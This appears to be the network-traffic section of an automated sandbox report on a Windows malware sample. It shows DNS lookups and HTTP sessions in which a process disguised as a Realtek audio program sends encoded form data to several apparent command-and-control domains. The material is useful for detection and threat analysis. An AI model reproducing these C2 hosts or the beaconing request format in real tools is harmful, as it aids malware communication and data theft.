                                                                                                                                                                              Jan 11, 2025 03:58:59.649151087 CET1.1.1.1192.168.11.200xe023No error (0)thaor56.online202.92.5.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:37.795315981 CET1.1.1.1192.168.11.200xb498Name error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:37.798178911 CET1.1.1.1192.168.11.200xa164Name error (3)claimstakes.onlinenonenone65IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:37.942929983 CET1.1.1.1192.168.11.200x938bName error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:38.120697021 CET1.1.1.1192.168.11.200xd4c1No error (0)google.com142.250.191.110A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:38.129187107 CET8.8.8.8192.168.11.200xc905No error (0)google.com142.250.190.110A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:39.151216984 CET1.1.1.1192.168.11.200xb47Name error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:39.152082920 CET1.1.1.1192.168.11.200x4444Name error (3)claimstakes.onlinenonenone65IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:42.519467115 CET1.1.1.1192.168.11.200xca0eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:42.519481897 CET1.1.1.1192.168.11.200x2ff4No error (0)www.google.com142.250.190.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:44.280523062 CET1.1.1.1192.168.11.200x84faName error (3)claimstakes.onlinenonenone65IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:44.304033995 CET1.1.1.1192.168.11.200x220bName error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:44.424940109 CET1.1.1.1192.168.11.200x3a56Name error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:57.771157980 CET1.1.1.1192.168.11.200xe3a3Name error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:00:14.586045980 CET1.1.1.1192.168.11.200xace3Name error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:00:14.590399981 CET1.1.1.1192.168.11.200xe4a3Name error (3)claimstakes.onlinenonenone65IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:00:14.734544039 CET1.1.1.1192.168.11.200x6a5cName error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:00:22.964394093 CET1.1.1.1192.168.11.200x5c89No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:00:40.206815958 CET1.1.1.1192.168.11.200x8d67No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:00:55.754957914 CET1.1.1.1192.168.11.200x7deeNo error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:01:14.897722006 CET1.1.1.1192.168.11.200x7675Name error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:01:14.902178049 CET1.1.1.1192.168.11.200xb20Name error (3)claimstakes.onlinenonenone65IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:01:15.044693947 CET1.1.1.1192.168.11.200xb6cbName error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:01:38.861677885 CET1.1.1.1192.168.11.200x1b2dName error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:02:07.407421112 CET1.1.1.1192.168.11.200xf1f3Name error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:02:27.303982973 CET1.1.1.1192.168.11.200xdc79Name error (3)claimstakes.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                              • babalharra.com.au
                                                                                                                                                                              • www.optimismbank.xyz
                                                                                                                                                                              • www.greenthub.life
                                                                                                                                                                              • www.laohub10.net
                                                                                                                                                                              • www.bankseedz.info
                                                                                                                                                                              • www.madhf.tech
                                                                                                                                                                              • www.yc791022.asia
                                                                                                                                                                              • www.43kdd.top
                                                                                                                                                                              • www.jcsa.info
                                                                                                                                                                              • www.1secondlending.one
                                                                                                                                                                              • www.zkdamdjj.shop
                                                                                                                                                                              • www.rgenerousrs.store
                                                                                                                                                                              • www.bpgroup.site
                                                                                                                                                                              • www.aballanet.cat
                                                                                                                                                                              • www.remedies.pro
                                                                                                                                                                              • www.thaor56.online

                                                                                                                                                                              HTTP Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.11.204975876.223.54.146806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:54:45.427309990 CET491OUTGET /98j3/?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:54:45.568183899 CET371INHTTP/1.1 200 OK
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:54:45 GMT
                                                                                                                                                                              content-length: 250
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 53 3d 6a 6f 31 69 4a 4f 6e 6a 38 75 65 47 5a 50 4a 44 66 76 79 57 6d 68 68 58 34 62 47 41 4a 6a 74 31 44 64 74 53 61 43 53 51 4c 35 76 33 55 45 59 42 45 35 56 41 54 67 6e 71 67 75 39 79 43 59 58 55 31 71 54 38 31 55 47 32 48 62 4f 4c 51 4c 42 62 5a 4e 44 6f 4a 61 71 69 57 61 67 4c 61 51 34 4d 72 70 5a 56 4a 6e 46 34 77 37 77 2f 48 4b 55 32 62 61 4f 64 45 62 34 3d 26 42 69 3d 7a 4a 5f 77 36 79 50 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG"}</script></head></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.11.2049759209.74.77.109806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:00.996870041 CET761OUTPOST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6e 6e 6a 4a 45 2f 79 42 66 74 61 34 77 30 36 48 34 47 72 78 65 6b 6a 6e 4a 4a 72 54 65 79 6a 46 36 48 4b 6e 73 79 4d 32 71 7a 76 70 61 76 32 6d 4d 4e 39 78 38 78 36 66 46 6e 42 54 52 59 58 61 59 51 69 65 48 4d 4f 69 2f 35 6f 38 76 4d 35 78 73 6a 43 76 41 4e 56 78 76 65 64 53 77 33 46 38 43 32 4c 62 6b 6d 6f 5a 36 63 33 63 2b 71 35 6b 44 6e 68 55 37 64 44 64 5a 63 47 67 59 6e 6c 44 43 45 58 44 72 6d 4b 37 44 68 62 73 5a 6b 77 64 36 39 43 79 52 59 51 78 33 4e 38 41 77 4f 79 49 61 73 2b 59 38 45 73 4b 5a 48 58 4f 75 4f 55 45 54 35 78 59 41 51 3d 3d
                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyRYQx3N8AwOyIas+Y8EsKZHXOuOUET5xYAQ==
                                                                                                                                                                              Jan 11, 2025 03:55:01.176788092 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:01 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.11.2049760209.74.77.109806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:03.702002048 CET781OUTPOST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 48 46 36 6a 61 6e 74 7a 4d 32 6d 54 76 70 52 50 32 6a 52 64 39 2b 38 78 33 38 46 69 68 54 52 59 44 61 59 51 79 65 48 37 69 6a 2b 70 6f 69 6b 73 35 6b 79 54 43 76 41 4e 56 78 76 65 4a 6f 77 30 31 38 44 48 37 62 6c 44 46 72 6b 73 33 66 6f 36 35 6b 4f 48 68 51 37 64 44 6a 5a 65 6a 4e 59 68 70 44 43 47 66 44 72 58 4b 34 5a 78 62 71 64 6b 78 50 32 49 76 57 49 62 41 2f 37 66 78 54 38 63 36 64 53 61 7a 43 68 32 59 75 61 55 4c 38 71 2b 74 73 52 37 77 44 64 55 2f 6b 71 58 4a 77 47 34 75 68 57 5a 67 6e 53 62 46 53 5a 4a 63 3d
                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUL8q+tsR7wDdU/kqXJwG4uhWZgnSbFSZJc=
                                                                                                                                                                              Jan 11, 2025 03:55:03.881547928 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:03 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.11.2049761209.74.77.109806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:06.400052071 CET7930OUTPOST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 50 46 37 52 53 6e 73 51 30 32 6f 7a 76 70 53 50 32 69 52 64 39 5a 38 78 76 67 46 69 6c 70 52 61 37 61 5a 7a 4b 65 42 50 32 6a 33 70 6f 69 72 4d 35 77 73 6a 43 41 41 4e 6c 31 76 65 5a 6f 77 30 31 38 44 45 54 62 68 57 70 72 6d 73 33 63 2b 71 35 34 44 6e 68 6f 37 64 4c 73 5a 65 6e 37 59 78 4a 44 48 57 50 44 70 46 69 34 53 78 62 6f 61 6b 77 4b 32 49 72 4a 49 62 64 47 37 65 45 4f 38 66 4b 64 52 37 61 41 31 79 63 54 45 6c 6a 30 6c 38 6c 44 52 4a 6f 39 64 55 6e 49 75 6c 4a 71 49 2b 69 51 49 70 30 71 49 72 74 54 45 73 42 69 4b 56 77 76 6c 4b 51 35 6c 4b 41 4a 45 43 78 73 4c 7a 6d 6a 74 75 44 52 31 47 7a 47 53 51 79 74 4d 47 41 56 43 2f 4d 6d 4a 71 4e 67 2f 54 71 6d 32 37 78 4c 70 32 76 62 2f 69 55 62 70 39 34 48 4f 4d 36 31 45 4e 6a 58 36 63 44 71 31 39 53 4b 55 57 2f 65 31 73 6e 54 4c 34 4b 72 62 6a 6a 69 56 41 67 67 44 4a 6c 67 4e 77 6a 2f 79 58 4b 4c 36 71 33 57 73 44 46 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAPF7RSnsQ02ozvpSP2iRd9Z8xvgFilpRa7aZzKeBP2j3poirM5wsjCAANl1veZow018DETbhWprms3c+q54Dnho7dLsZen7YxJDHWPDpFi4SxboakwK2IrJIbdG7eEO8fKdR7aA1ycTElj0l8lDRJo9dUnIulJqI+iQIp0qIrtTEsBiKVwvlKQ5lKAJECxsLzmjtuDR1GzGSQytMGAVC/MmJqNg/Tqm27xLp2vb/iUbp94HOM61ENjX6cDq19SKUW/e1snTL4KrbjjiVAggDJlgNwj/yXKL6q3WsDFrQamS+3A+DqkC+A+4/AueFTbCzRjlbCIkVjYtR11q8SkeW9kFO+JEF2HQFvnjOJNlP/xZw2zAVULmpT0h6b9OAgOLgX/ArMQ2RmtcUun6IYP1YTMJwzxXrbfgFyK6aMbgZxigR6Z3n/ZTKnSKq2T1EWxGJsIZKn2ghnJUewetf0CbHlXByaHPbMYEHxVhcI/qXnc9b8c4XcMwz1gp2Zzn9eI+ZaNFyN6zbEDj3e/CycFr4NuFDHBqMl4MYEggAdeDazDv7h6lmwmId8No7OSr0Bch7jmfTBQDkm6g8gljmByHqN7kVOIGL3QfcnYncIJec+ASSovu3R2CrP33Yzqxcoui/m28lYDAZZZ9TjtrmDprTc3R8ez6JhdelD72gksBTPgFKAn3YY8VUBuBHrdDBKuMBXFeEyHC2m6FGFivrH7dDbFBIwxmiX6o2w5v8pLfn3AkdlBF5BJr7FsYdlnLKDpRjkKvXK84jgMiF6G3xBKfKv69BeYRw8797D7FwcsEzXpyNlfpXaIDJNfAiw1JcNBCSEkcSiVOMJ/rgdTaTLIqaO4wcsL9/OBbw+tBrvHu7KJfD/O4oqAjftwrDH5Zcxo/3nw0tVsQU1PczBggG3Y1oo5TutTA2gvTNAOmlGs25YUA+1NdX0eRkcW35hUbOSGGbp8FoBT/J [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:55:06.581365108 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:06 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.11.2049762209.74.77.109806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:09.100864887 CET489OUTGET /r3zg/?Bi=zJ_w6yPG&iS=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:55:09.280426979 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:09 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.11.204976327.124.4.246806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:15.029949903 CET755OUTPOST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
